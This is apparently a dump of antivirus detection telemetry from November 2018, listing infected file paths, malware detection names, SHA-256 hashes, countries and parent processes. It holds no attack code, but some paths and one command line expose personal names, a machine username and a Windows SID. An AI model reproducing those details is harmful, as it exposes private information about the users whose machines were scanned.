  Row(detection=Row(filename='copy of kerusakan c-2a.xls', filepath='\\\\sango04\\rheology\\INA\\Copy of KERUSAKAN C-2a.xls', filesize=1408000, name='X2000M/Laroux.B.#M1.#R1'), hash='2f5f15749752e7dc7ed01e76fca7f94606b19046c89897b234a063fd7b2b21dd', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1821808, timestamp='2018-11-01T07:26:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='z-enemy.exe', filepath='\\\\?\\C:\\mining\\z-enemy-1.22_x32\\z-enemy.exe', filesize=13120000, name='HEUR/AGEN.1033252.#M1.#R1'), hash='2fceedab18e5468969fc4112ba2f5b78caf66cbaa0db75bf9779955a54076c32', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T21:56:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='z-enemy.exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\z-enemy.1-22-cuda10.0_x32\\z-enemy.exe', filesize=13120000, name='HEUR/AGEN.1033252.#M1.#R1'), hash='2fceedab18e5468969fc4112ba2f5b78caf66cbaa0db75bf9779955a54076c32', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:56:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='30084db8807a5e8a313bb2449496faa258b7df1b9031fb2d7d0a2ef8c9bf5090', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\30084DB8807A5E8A313BB2449496FAA258B7DF1B9031FB2D7D0A2EF8C9BF5090', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='30084db8807a5e8a313bb2449496faa258b7df1b9031fb2d7d0a2ef8c9bf5090', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:51:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setuperror.exe', filepath='D:\\upgrate\\sources\\setuperror.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='3032cf6376bee15074add20c4bb2ae8e1e266689fc8cb602594921a479c81214', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T22:25:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='keygen.exe', filepath='E:\\Programing\\Programming Software\\Toad for Oracle 9.7.0.51 Commercial\\keygen.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='3032e0808e60987d34c3ad1b2e9c0bc0312be1b080c6b1868f63f7b1271b16b5', metadata=Row(cmdline=None, country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T08:59:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='keygen.exe', filepath='\\\\?\\E:\\Programing\\Programming Software\\Toad for Oracle 9.7.0.51 Commercial\\keygen.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='3032e0808e60987d34c3ad1b2e9c0bc0312be1b080c6b1868f63f7b1271b16b5', metadata=Row(cmdline=None, country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:02:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c6f1ac2632199f5ac4bfdc1615e3e0acf77c0382', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\c6f1ac2632199f5ac4bfdc1615e3e0acf77c0382', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='303801a4005b1d6e7bb2f0dc65a0586a13fa7bd1e2477287367af968c6ddd83b', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:35:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='307dc7a81ab0414fdc5a24ad6448bb9d06d919c59abd060b0d8f9d04fcb1c95f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\307DC7A81AB0414FDC5A24AD6448BB9D06D919C59ABD060B0D8F9D04FCB1C95F', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='307dc7a81ab0414fdc5a24ad6448bb9d06d919c59abd060b0d8f9d04fcb1c95f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:59:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-164918-f2dc2997', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_60a6277a\\AVSCAN-20181101-164844-ECFF01C0\\AVSCAN-20181101-164918-F2DC2997', filesize=5632000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='30832edce2c0babe49a581af32e7e4a87e257d22598bdcc3e501c0cecb1b33be', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:49:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='adjprog.exe', filepath='C:\\Users\\X\\Desktop\\Adjprog.exe', filesize=5632000, name='TR/Crypt.XPACK.Gen2.#M300.#R100738'), hash='30832edce2c0babe49a581af32e7e4a87e257d22598bdcc3e501c0cecb1b33be', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T19:47:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='adjprog.exe', filepath='C:\\Users\\X\\Desktop\\Adjprog.exe', filesize=5632000, name='TR/Crypt.XPACK.Gen2.#M300.#R100738'), hash='30832edce2c0babe49a581af32e7e4a87e257d22598bdcc3e501c0cecb1b33be', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T19:47:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='adjprog.exe', filepath='D:\\TOP MIL\\BALCAO MATRIZ\\TOP MIL 3\\2018\\PROGRAMAS T.I\\Reset Epson Serie L\\Todos os Resets\\Epson Adjustment Program Resetter L350-L355-L550-L555-L110-L210-L300\\Adjprog.exe', filesize=5632000, name='TR/Crypt.XPACK.Gen2.#M300.#R100738'), hash='30832edce2c0babe49a581af32e7e4a87e257d22598bdcc3e501c0cecb1b33be', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Cobian Backup 11\\cbService.exe', parentsize=1131008, timestamp='2018-11-01T22:13:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='adjprog.exe', filepath='E:\\L350_L355_L550_L555_L110_L210_L300\\Adjprog.exe', filesize=5632000, name='TR/Crypt.XPACK.Gen2.#M300.#R100738'), hash='30832edce2c0babe49a581af32e7e4a87e257d22598bdcc3e501c0cecb1b33be', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T12:39:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='st6unst.exe', filepath='D:\\MAIN CROFIL DOCS SERVER 2010\\BACK UP\\NENITA GARCIA FILES\\SSS-DIFF. COMPANY\\NELTEX SSS\\SSS2010\\NELTEX  MAY. 2010\\ST6UNST.EXE', filesize=2240000, name='W32/Sality.AT.#M1.#R1'), hash='3089357a0215d9e4526c28dddc1c2f86ac6673e5791c3d60733b2ae1601c4747', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:46:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ความทรงจำ.exe', filepath='E:\\picture\\ความทรงจำ\\ความทรงจำ.exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='30d4781f4428aa4ab1ce7c166165988d445e4b8ed8559cc485721a90eb5fbe7f', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:15:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='kact2.exe', filepath='D:\\Mihaela (my documents)\\Kx602212_UPD_Signed_en\\32bit\\XP and newer\\KACT2\\KACT2.exe', filesize=1024000, name='W32/Sality.Y.#M1.#R1'), hash='30fae1a442acf6b7fe61ed7ee75dc54f055676fe45de4c760cec41918a89405c', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:25:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=2400000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='313a83ad30e993d19cc51cc281b8ae29526266f1038c59f9a9737c9dadf68376', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T01:00:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=2400000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='313a83ad30e993d19cc51cc281b8ae29526266f1038c59f9a9737c9dadf68376', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T22:38:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-170819-cb4c800b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7cb21549\\AVSCAN-20181101-165012-79405224\\AVSCAN-20181101-170819-CB4C800B', filesize=2124000, name='TR/Graftor.141601.A.#M1.#R1'), hash='314e60701434e5398d5006c50cb0be7cd6f179184a4cd7ac0ce67e1b557ac659', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:08:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='raidreconstructor.exe', filepath='K:\\HBCD\\Programs\\RAIDRECONSTRUCTOR.EXE', filesize=64000, name='TR/Agent.wxqvk.#M1.#R1'), hash='3158f958bd97188137ab047ed4a4963579c6eb8cfb7d5bb9e4da03d817cb1f72', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='K:\\HBCD\\PStart.exe', parentsize=786952, timestamp='2018-11-01T17:00:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-190851-172dc30e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-190219-D4548F48\\AVSCAN-20181101-190851-172DC30E', filesize=64000, name='TR/Agent.wxqvk.#M1.#R1'), hash='3158f958bd97188137ab047ed4a4963579c6eb8cfb7d5bb9e4da03d817cb1f72', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:08:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vrt17f6.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\VRT17F6.tmp', filesize=2176000, name='PUA/ICLoader.Gen7.#M300.#R604135'), hash='3186d10c3568de84c1543e9ca89d744f7877cc1565401b73af2ebd2df894a594', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:42:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:05:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:12:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:59:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:59:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:12:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:05:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:59:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:13:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:13:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:51:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:51:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:13:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:51:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:12:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:59:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:59:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='328aa382169f70a78fbf7ead02e6c8d34d6eb1025102902ec627f1f23717eded', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\328AA382169F70A78FBF7EAD02E6C8D34D6EB1025102902EC627F1F23717EDED', filesize=1008000, name='TR/Crypt.XPACK.Gen.#M300.#R3455'), hash='328aa382169f70a78fbf7ead02e6c8d34d6eb1025102902ec627f1f23717eded', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:59:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='syncversion.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\{406976D2-653B-1BA4-0E0D-3C76D2DFC148}\\SyncVersion.exe', filesize=320000, name='ADWARE/DealPly.Gen2.#M300.#R101520'), hash='32c3ffac25787bfef32d695bfeba13d9f8265b4c5bc7b653fe767c076ef02822', metadata=Row(cmdline='{03165287-559A-4375-9296-C94561D91A38} S-1-5-21-25666152-1838492169-3340794220-1000:Lena-TOSH\\\\\\\\Lena:Interactive:Highest[1]', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\taskeng.exe', parentsize=192000, timestamp='2018-11-01T11:04:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-000632-16d8c428', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_09479a50\\AVSCAN-20181101-232059-A9CB4FEB\\AVSCAN-20181102-000632-16D8C428', filesize=432000, name='Adware/Ibryte.bxpj.#M1.#R1'), hash='331a02dc5297a1d3a9d00567566bd8138ed365685faaaf71965f008290871e92', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T22:05:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='005-[s] - mild [new single].exe', filepath='E:\\music\\music\\Vampires 652 P\\005-[S] - MILD [New Single]\\005-[S] - MILD [New Single].exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='336cbdd63ca1e571ea773fc79cafad47042ecf28c82a96a452a5d0c3a4ad5b2c', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:13:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='33828369730247712ee6878d8fbb0ac61007dfdb6e2771a429ded6e06747b954.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-19.available\\Avira\\33828369730247712EE6878D8FBB0AC61007DFDB6E2771A429DED6E06747B954.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='33828369730247712ee6878d8fbb0ac61007dfdb6e2771a429ded6e06747b954', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:44:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='33e1ec0aac064c83afb7e756d2a65c30af9a1a7eae565456582f34ca6a690ced', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T23:39:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='driverimportpe.exe', filepath='K:\\HBCD\\Programs\\DRIVERIMPORTPE.EXE', filesize=64000, name='TR/Siggen.64000.2.#M1.#R1'), hash='33e25a0a50e61900ef969fe4a406e8d89dec25d5081b0403b61e97927c18403d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='K:\\HBCD\\PStart.exe', parentsize=786952, timestamp='2018-11-01T17:00:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-190955-22246c9a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-190219-D4548F48\\AVSCAN-20181101-190955-22246C9A', filesize=64000, name='TR/Siggen.64000.2.#M1.#R1'), hash='33e25a0a50e61900ef969fe4a406e8d89dec25d5081b0403b61e97927c18403d', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:09:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='baa8ec91f0a7ca4f60de1a22a66d9b0e480a4bc8', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\2\\baa8ec91f0a7ca4f60de1a22a66d9b0e480a4bc8', filesize=1216000, name='W32/Virut.Gen.#M1.#R1'), hash='3467ffde1260853ebad6d8dcdff007c311c2c0196751609e0c99cfc85132eeed', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T12:27:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='baa8ec91f0a7ca4f60de1a22a66d9b0e480a4bc8', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\baa8ec91f0a7ca4f60de1a22a66d9b0e480a4bc8', filesize=1216000, name='W32/Virut.Gen.#M1.#R1'), hash='3467ffde1260853ebad6d8dcdff007c311c2c0196751609e0c99cfc85132eeed', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T12:29:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ar405eng.exe', filepath='C:\\Users\\X\\Desktop\\MS-Office 2007\\languege  ++\\java\\BLUE_J\\AR405ENG.EXE', filesize=224000, name='TR/Patched.Gen.#M300.#R3369'), hash='348160992ce9581786ed0cbad3f663ab7022c159087f641916f352db0beb7106', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:AienThs2pkGtAdDt.1', country='BE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T20:10:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e_s50st7.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{2EE500BE-2AB5-49DB-9AE1-E1ACF7D4782D}\\E_S50ST7.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='359b9d05250d48c16fca570a2542ac05218be427003cec0757ab4725646fbdc9', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T00:59:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pdf2word.exe', filepath='\\\\?\\C:\\Program Files (x86)\\FM Software Studio\\Free PDF To Word Converter\\PDF2Word.exe', filesize=1024000, name='W32/Infector.Gen8.#M300.#R700734'), hash='36734b21b88ed67e118d537af9c9f6b1df8a30af7ffc23dd33a15a66437af994', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:28:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pdf2word.exe', filepath='C:\\Program Files (x86)\\FM Software Studio\\Free PDF To Word Converter\\PDF2Word.exe', filesize=1024000, name='W32/Infector.Gen8.#M300.#R700734'), hash='36734b21b88ed67e118d537af9c9f6b1df8a30af7ffc23dd33a15a66437af994', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T03:19:57Z'), dt=datetime.date(2018, 11, 1)),
